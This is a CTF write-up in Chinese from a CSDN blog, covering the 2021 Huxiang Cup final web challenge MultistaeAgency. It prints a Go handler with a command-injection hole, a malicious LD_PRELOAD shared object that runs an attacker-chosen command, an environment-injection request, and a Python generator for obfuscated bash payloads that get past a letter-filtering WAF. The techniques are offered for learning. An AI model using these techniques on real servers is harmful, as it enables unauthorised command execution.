[湖湘杯 2021 final]MultistaeAgency

于 2022-10-24 21:49:42 发布
阅读量244 收藏
点赞数
分类专栏: 比赛wp 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52367015/article/details/126982959
版权

RCE漏洞 WAF绕过 恶意SO文件 环境变量 Web安全
关键词由CSDN通过智能技术生成

附件

在这里插入图片描述

web下的main.go
在这里插入图片描述
存在三个路径
list展示上传到token下的文件
在这里插入图片描述

upload上传文件并请求内网9091的manage接口
在这里插入图片描述

token:获取token并添加环境变量
在这里插入图片描述
manage接口

func manage(w http.ResponseWriter, r *http.Request) {
	values := r.URL.Query()
	m := values.Get("m")
	if !waf(m) {
		fmt.Fprintf(w, "waf!")
		return
	}
	cmd := fmt.Sprintf("rm -rf uploads/%s", m)
	fmt.Println(cmd)
	command := exec.Command("bash", "-c", cmd)
	outinfo := bytes.Buffer{}
	outerr := bytes.Buffer{}
	command.Stdout = &outinfo
	command.Stderr = &outerr
	err := command.Start()
	res := "ERROR"
	if err != nil {
		fmt.Println(err.Error())
	}
	if err = command.Wait(); err != nil {
		res = outerr.String()
	} else {
		res = outinfo.String()

	}
	fmt.Fprintf(w, res)
}

在这里存在rce的点

其中有一个waf

func waf(c string) bool {
	var t int32
	t = 0
	blacklist := []string{".", "*", "?"}
	for _, s := range c {
		for _, b := range blacklist {
			if b == string(s) {
				return false
			}
		}
		if unicode.IsLetter(s) {
			if t == s {
				continue
			}
			if t == 0 {
				t = s
			} else {
				return false
			}
		}
	}

	return true
}

既然会加载环境变量,可以让其加载恶意的so文件来rce

#include<stdlib.h>
__attribute__((constructor)) void l3yx(){
    unsetenv("LD_PRELOAD");
    system(getenv("_evilcmd"));
}

gcc -shared -fPIC -o evil.so evil.c

大致思路:
通过上传恶意的so文件来rce,先访问/token获取到token的值,因为后面会有检验,upload会将其移动到token目录下,上传会发现其请求/token?http_proxy=127.0.0.1:8080获取到token,也就是proxy代理实现。再去curl内网的9091manage接口,将m参数传入即可得到flag,当然还要先绕过waf

在这里插入图片描述

/token?http_proxy=127.0.0.1:8080&LD_PRELOAD=/code/uploads/2ea6a3a71d0b2db658544f67f1468897/XVlBz&_evilcmd=ls /


from urllib.parse import quote
n = dict()
n[0] = '0'
n[1] = '${##}'
n[2] = '$((${##}<<${##}))'
n[3] = '$(($((${##}<<${##}))#${##}${##}))'
n[4] = '$((${##}<<$((${##}<<${##}))))'
n[5] = '$(($((${##}<<${##}))#${##}0${##}))'
n[6] = '$(($((${##}<<${##}))#${##}${##}0))'
n[7] = '$(($((${##}<<${##}))#${##}${##}${##}))'

f=''

def str_to_oct(cmd):
    s = ""
    for t in cmd:
        o = ('%s' % (oct(ord(t))))[2:]
        s+='\\'+o
    return s

def build(cmd):
    payload = "$0<<<$0\<\<\<\$\\\'"
    s = str_to_oct(cmd).split('\\')
    for _ in s[1:]:
        payload+="\\\\"
        for i in _:
            payload+=n[int(i)]
    return payload+'\\\''

print(quote(quote("123;"+build("cat /flag"))))

在这里插入图片描述

2021年--湖湘--final
unexpectedthing的博客
04-28 1401
21年湖湘比赛
2021-湖湘final-Web
feng的博客
01-05 2211
2021-湖湘final-Web 前言 今年湖湘报的社企组的结果就是最后只能摆烂,然后决赛那段时间正好在复习期末,然后考完了想好好的休息一段时间,打游戏打累了再来复现一下湖湘final的题目放松放松。 vote 今年HTB的基本上算是原题了,复现的时候才发现当时做那题的时候就摆烂没管了,所以一点印象没有。。。 const path = require('path'); const express = require('express'); const pug
[CTF复现]湖湘2021
anwen12的博客
12-14 3849
go_web 今天又是学爆guoke哥哥博客的一天 0x01 MultistageAgency 通过看源码 我们发现 这个题是三个服务 su - web -c "/code/bin/web 2>&1 >/code/logs/web.log &" su - web -c "/code/bin/proxy 2>&1 >/code/logs/proxy.log &" /code/bin/server 2>&1 >/code/log
2021湖湘WEB
~airrudder~
03-02 873
文章目录2021 湖湘MultistaeAgencyPenetratablevote 2021 湖湘 MultistaeAgency 分析参考文章:2021湖湘决赛-MultistageAgency。 一道 Golang 的题目,附件目录结构如下所示: tree . ├── Dockerfile ├── dist │ ├── index.html │ └── static │ ├── css │ │ ├── app.21c401bdac17302cdde185ab
ByteCTF2021 Final reverse ByteService wp
qq_41866334的博客
12-13 3134
ByteCTFFinal2021 reverse ByteService wp 题目给的apk里面是一个RPC调用, 发现找了ByteService这个服务 public void callCTFService(int i, int i2) { try { Class<?> cls = Class.forName("android.os.ServiceManager"); Parcel obtain = Parcel.obtain(
final finally finalize()区别
热门推荐
ConstXiong
04-10 1万+
final finally finalize()区别 final 表示最终的、不可改变的。用于修饰类、方法和变量。 finally 异常处理的一部分,它只能用在try/catch语句中,表示希望finally语句块中的代码最后一定被执行(但是不一定会被执行) finalize()是在java.lang.Object里定义的,Object的finalize方法什么都不做,对象被回收时fin...
CTF 湖湘 决赛 2021 final.zip
12-07
【CTF 湖湘 决赛 2021 final】 CTF(Capture The Flag)是一项网络安全领域的竞技活动,参与者通过解决一系列网络安全问题来获取得分,最终以得分高低决定胜负。湖湘作为一项知名的CTF比赛,旨在促进网络安全...
湖湘2021-pwn-final部分复现
qq_53062301的博客
12-09 4993
第一次参加awd+,虽然成绩不是很好(大佬太多被打烂了),有很多收获,awd+赛制中可以通过攻击和防御两个手段来得分,攻击的话就是类似于正常的ctf,只不过如果成功攻击后,平台会使用官方的exp来去打全场,就是如果攻击成功,每轮(这次湖湘是20分钟一轮)都会获得攻击得分,得分会随着做题成功人数增多而减少,防御的话就是patch一下程序,然后通过ftp上传到服务器上,然后申请防御,也是防御成功就会每轮都会得分,但是防御有三种情况,一种是exp利用成功,也就是没有防御成功,还有一种清况,就是c...
2021年春秋网络安全联赛秋季赛逆向snake.exeWriteup
m0_58348028的博客
11-28 1万+
【Java基础知识 14】java final关键字
学Java,找哪吒
11-17 5760
final关键字可以用来修饰引用、方法和类。
2021华为D题:抗乳腺癌候选药物的优化建模(附完整Python代码)
全栈川川
09-21 4741
2021华为D题详细讲解,完整给代码
第七届“湖湘”网络安全技能大赛免费赛前培训通知
weixin_59086772的博客
10-28 2054
为了深入开展网络安全知识技能宣传普及,提高广大群众对网络安全意识和防护技能”的应对能力,挖掘和培养网络安全全能型人才,加快网络安全人才队伍建设。湖南省委网信办联合相关部门共同举办第七届“湖湘”网络安全技能大赛。 一、组织机构 主办单位:中共湖南省委网络安全和信息化委员会办公室、湖南省教育厅、湖南省广播电视局、湖南省政务管理服务局、湖南省通信管理局、长沙市人民政府 承办单位:中共长沙市委网络安全和信息化委员会办公室、国家网络安全产业园区(长沙)城市网络安全运营中心、奇安星城网络安全运营服.
湖湘 2021 Crypto (连分数运用)
u010883831的博客
11-24 1546
湖湘 2021 Crypto1.题目2.分析3.实现 连分数 continued_fraction 比赛当时这道题被A爆了,但我就是做不出来。心态炸了。 前几天打西湖,学了点Wiener Attack和连分数,又打开了一直存在桌面的这道题,豁然开朗。 1.题目 from Crypto.Util.number import * import random from math import * from gmpy2 import * ''' m1 = bytes_to_long(flag[:len(flag
macOS_Sequoia_15.1.password(imacos.top).rdr.split.016
11-09
macOS_Sequoia_15.1.password(imacos.top).rdr.split.016
【java毕业设计】小区物业管理系统(springboot+vue+mysql+说明文档).zip
11-09
项目经过测试均可完美运行! 环境说明: 开发语言:java jdk:jdk1.8 数据库:mysql 5.7+ 数据库工具:Navicat11+ 管理工具:maven 开发工具:idea/eclipse
里面全部都是浪漫的爱心特效,有html和python编写的,大概几十种,欢迎下载,收藏
11-09
里面全部都是浪漫的爱心特效,有html和python编写的,大概几十种,欢迎下载,收藏
Delphi 12 控件之FUPX-32bit-PORTABLE.zip
11-09
FUPX_32bit_PORTABLE.zip
HandyControl
最新发布
11-09
HandyControl
2021湖湘CTF决赛:AWD赛事精华汇总
在提到的文件“CTF 湖湘 决赛 2021 final.zip”中,虽然没有直接提供详细信息,但根据文件名我们可以推测这可能是2021湖湘CTF比赛决赛的相关资源文件。文件可能包含了决赛阶段的比赛题目、资源文件、解题脚本...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值